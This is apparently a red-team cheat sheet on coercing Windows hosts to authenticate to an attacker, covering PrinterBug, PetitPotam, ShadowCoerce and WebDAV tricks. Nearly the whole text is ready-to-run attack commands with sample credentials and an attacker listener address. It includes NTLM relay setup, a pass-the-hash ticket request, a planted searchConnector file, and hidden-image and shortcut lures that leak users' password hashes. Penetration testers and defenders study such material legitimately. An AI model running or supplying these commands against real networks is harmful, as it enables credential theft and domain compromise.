Authentication Coercion
Printer Bug (MS-RPRN)
Check if Spooler is running via Remote Registry:
$ rpcdump.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11 | grep -A2 -e MS-RPRN -e MS-PAR
SpoolSample
Cmd > .\SpoolSample.exe 192.168.1.11 10.10.13.37
Cmd > .\SpoolSample.exe 192.168.1.11 attacker@80/test.txt
Cmd > .\SpoolSample.exe 192.168.1.11 attacker@SSL/test.txt
dementor.py
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@80/test.txt DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@SSL/test.txt DC01.megacorp.local
printerbug.py
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 10.10.13.37
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@80/test.txt
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@SSL/test.txt
PetitPotam (MS-EFSR)
CVE-2021-36942
$ python3 PetitPotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11 [-pipe all]
$ python3 PetitPotam.py -d '' -u '' -p '' attacker@80/test.txt 192.168.1.11
$ python3 PetitPotam.py -d '' -u '' -p '' attacker@SSL/test.txt 192.168.1.11
Cmd > .\PetitPotam.exe 10.10.13.37 192.168.1.11 1
Cmd > .\PetitPotam.exe attacker@80/test.txt 192.168.1.11 1
Cmd > .\PetitPotam.exe attacker@SSL/test.txt 192.168.1.11 1
PetitPotam any host (not only a DC with null sessions allowed for the IPC$
share) without initial creds via proxying through an authenticated session on behalf a DC-relayed machine account:
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
Something went wrong, check error status => SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
$ ntlmrelayx.py -ip 10.10.13.37 -t 192.168.1.11 -smb2support -socks --no-http-server --no-wcf-server --no-raw-server
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 DC1.megacorp.local
ntlmrelayx> socks
ntlmrelayx> stopservers
$ sudo ./Responder.py -I eth0 -vA
$ proxychains4 python3 Petitpotam.py -d MEGACORP -u 'DC1$' -no-pass 10.10.13.37 192.168.1.11
With Kerberos authentication:
$ getTGT.py megacorp.local/snovvcrash -hashes e929e69f7c290222be87968263a9282e:e929e69f7c290222be87968263a9282e -dc-ip 192.168.1.11
$ KRB5CCNAME=`pwd`/snovvcrash.ccache python3 PetitPotam.py -k -no-pass -d megacorp.local -u snovvcrash target.megacorp.local attacker.megacorp.local
Theory
Mitigation
ShadowCoerce (MS-FSRVP)
$ python3 shadowcoerce.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 192.168.1.11
EvilentCoerce (MS-EVEN)
WebDAV (WebClient)
Check if callback via WebDAV (HTTP) is possible. It is when the WebClient
service is running. If it's possible, then NTLM Relay to LDAPS on behalf of the relayed machine account is your chance for RBCD workstation takeover.
Check via PowerShell:
PS > Install-Module -Name NtObjectManager
PS > Get-NtFile -Win32Path '\\192.168.1.11\pipe\DAV RPC SERVICE'
Check via CME:
$ cme smb smb.txt -u snovvcrash -p 'Passw0rd!' -M webdav | grep -a 'WebClient Service enabled'
Check via GetWebDAVStatus:
PS > .\GetWebDAVStatus.exe SRV01,SRV02 --tc 1
Enable WebClient
Put the .searchConnector-ms
file on a writable share. When a domain user opens target folder in explorer, the WebClient service should start automatically:
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<description>Microsoft Outlook</description>
<isSearchOnlyItem>false</isSearchOnlyItem>
<includeInStartMenuScope>true</includeInStartMenuScope>
<templateInfo>
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
</templateInfo>
<simpleLocation>
<url>https://whatever/</url>
</simpleLocation>
</searchConnectorDescription>
CVE-2022-30216
NTLM Leak
Leak with PowerShell:
PS > IWR -UseDefaultCredentials http://10.10.13.37/index.html
Leak with Python:
import win32com.client
URL = 'http://10.10.13.37/index.html'
COM_OBJ = win32com.client.Dispatch('WinHTTP.WinHTTPRequest.5.1')
COM_OBJ.SetAutoLogonPolicy(0)
COM_OBJ.Open('GET', URL, False)
COM_OBJ.Send()
print(COM_OBJ.ResponseText)
Leak with rpcping (catch with Responder's DCE-RPC listener):
Cmd > rpcping -s 10.10.13.37 -e 135 -a privacy -u NTLM
Leak with a hidden image:
<img src="\\10.10.13.37\pwn.ico" height="1" width="1" />
Leak with a shortcut:
$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut("\\SRV01\PublicShare\pwn.lnk")
$lnk.IconLocation = "\\10.10.13.37\pwn.ico"
$lnk.Save()
Leak with curl:
Cmd > curl.exe -i --ntlm -u : http://10.10.13.37/index.html
Tools
Coercer
$ coercer coerce -u snovvcrash -p 'Passw0rd!' -f dc.txt -l 10.10.13.37 [--filter-pipe-name efsrpc] [--filter-method-name EfsRpcDuplicateEncryptionInfoFile] --auth-type smb --always-continue --delay 1
Last updated